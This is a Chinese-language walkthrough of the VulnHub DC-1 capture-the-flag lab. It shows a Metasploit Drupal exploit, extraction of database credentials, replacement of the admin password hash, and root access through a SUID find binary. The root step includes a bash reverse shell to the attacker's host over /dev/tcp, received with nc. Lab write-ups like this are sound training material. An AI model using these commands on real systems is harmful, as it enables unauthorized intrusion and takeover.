靶機DC1下載地址：https://www.vulnhub.com/entry/dc-1,292/
kali ip：192.168.70.129
靶機DC1IP：192.168.70.160

一、信息搜集

靶機ip發現

端口掃描

進行目錄掃描，并沒發現什么可以利用的目錄

二、漏洞利用

使用msf查找drupal的漏洞
命令:search drupal

這里選擇一個最新的漏洞，設置rhost即可

成功接收會話

查看flag1

所有好的cmd都需要一個配置文件，和你一樣
查到drupal的配置文件所在目錄為：/var/www/sites/default/
查看配置文件

暴力破解和字典攻擊不是
*只有獲得訪問權限的方式（您將需要訪問權限）。

• 您可以使用這些憑據執行哪些操作？
  

再往下看到mysql的賬號密碼

Username：dbuser Passwd：R0ck3t

使用python開一個交互式窗口并進行mysql連接

python -c ‘import pty; pty.spawn(“/bin/bash”)’

查詢drupaldb數據庫和表users

發現賬號密碼

發現密碼是加密的，這里可以選擇對賬號的密碼進行替換

www-data@DC-1:/var/www$ php scripts/password-hash.sh ycx
password: ycx hash:
$S$DmVn5QNQW0UeWa6YUX2dKoAlRmmo3KsYuEMb1OstHXhC0AMEwe5D

查看users的表結構

使用update將admin的數據進行替換

也可以使用腳本進行攻擊，這樣更方便一些

這里只測試了自帶的重置密碼
這里就修改成功了，登錄一下網頁試試看

在網頁中的dashbroad找到flag3

特殊的 PERMS 將幫助找到 passwd - 但您需要 -exec 該命令來弄清楚如何獲取shadow中的東西。
查看passwd和shadow文件

查看shadow權限不足
從passwd得知flag4
在flag4的賬戶中找到flag4

三、提權

可以使用LinEnum腳本進行掃描
使用find命令查找有root權限文件
發現命令find可以提權

find `which find` -exec whoami \;

#命令解釋： 以find 命令 執行 whoami 命令。 # find (一個路徑或文件必須存在) -exec 執行命令 （結束）;

find反彈shell

find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.70.129/9999 0>&1 \;

使用nc接收反彈會話
nc -lvvp 9999

總結

以上是生活随笔為你收集整理的vulnhub靶机DC1的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。